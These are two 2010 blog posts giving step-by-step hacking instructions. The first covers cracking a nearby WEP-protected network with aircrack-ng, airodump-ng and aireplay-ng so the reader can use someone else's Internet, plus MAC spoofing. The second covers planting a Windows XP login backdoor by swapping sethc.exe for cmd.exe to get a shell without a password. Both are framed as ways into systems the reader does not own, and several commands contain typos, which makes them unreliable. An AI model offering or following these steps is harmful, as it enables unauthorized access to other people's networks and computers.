Thursday, September 9, 2010

Wireless Hacking..

Wireless Stuffs.... ( Hack to Learn never learn to hack )



I know how it feels when u have no Internet of ur own and u really need it. If there is any wireless network in range and u don't know the WEP Key of that network it feel more bad.
And if u are a computer engineer and u still not able to crack the WEP Key , then its owful...

Don't worry guys.. Try this.... Crack the WEP.. Njoy :)

1. MAC Filtering
2. MAC Spoofing

lets start the FUN

Check the MAC address of the hardware
ipconfig /all
getmac

These bothh commands are use to check the MAC address of the available hardwares.
If u wanna change the MAC Address
config -> Advance -> Network Address

Time of Some Wireless Hacking... WEP Key

Wired Equivalent Protection/privacy (WEP)

Hey u all u need atleast 20K data packets to crack the WEP Key.

Insert the LINUX Backtrack Disk into the disk Drive.

Follow the steps correctly..

1. First check the name of wireless card

-1wconfig after run this command u got the name of ur target wireless card for example ( wifi0 )

2. Now put this card in monitor mode

-airmon-ng start wifi0   This command enable the monitor mode for card wifi0.

3.Check the wireless connection present in range

-airodump-ng athl

4. To collect the datapacket u need some informations.
    a: BSSID of Victim Router
    b: Channel of the Victim Router
    c: ESSID of the Victim Router.

These all informations are received by the upper command ( -airodump-ng athl )

5. Now start collecting the packets

-airodump-ng -c 1--bssid 00:22:3F:32:87:AE -w abc ath1

ath1 is the name of card in which is in monitor mode.

Now open the new shell to run this command.

6. To ping associated with router.

-aireplay-ng -1 0 -a 00:22:3F:32:87:AE -e mannu ath

suppose that mannu is the name of the network.

Now open another new shell to run this command.

7: To associate with router again and again

-aireplay-ng -3 -b 00:22:3F:32:87:AE -e mannu ath1

wait few seconds untill u have 20K or more data packets.

8: To retrive the key from these data packets, run this command in ur shell

-aircrack-ng 64--bssid 00:22:3F:32:87:AE abc-01.cap

The file name is something like abc-01.cap
Run the uppar command again in a new shell and remove the colon ( : ) from the whole string u received.

The end string is ur WEP Key for the router.



Thankx and Regards

Manmohan Mishra
Computer Engineer

Wednesday, September 8, 2010

How to Create a Backdoor Login.


If u found a running OS of Windos XP and u want to access that system without even knowing its user password.. Just pinch ur brain little...


 

Follow these steps:

1: Find out the sethc.exe file in ur windows folder. This file is usually found in C:\win\sys32

sethc.exe is an executable file for the stikkeys.. When U press the SHIFT button five times then the stikkeys option is appear on the screen. This file can execute at that time too when u are at LOGIN Screen.

2: If u found that file , CUT that file and paste it anywhere u want.

3: Now find out another executable file cmd.exe , this file is also present in same folder.

4: Change the name of the file from cmd.exe to sethc.exe

5: Now u can restart the system.

At the login screen u just need to press the SHIFT key five times. CMD screen will appear and the whole system is yours...

Keep Enjoying... Now that system is all yours...


ADVICE: Never put your system ON. If u go somewhere just for sometime make sure that your system is LOCKED at least...
Else don't put password at ur account...



Thankx and Regards
Manmohan Mishra
Computer Engineer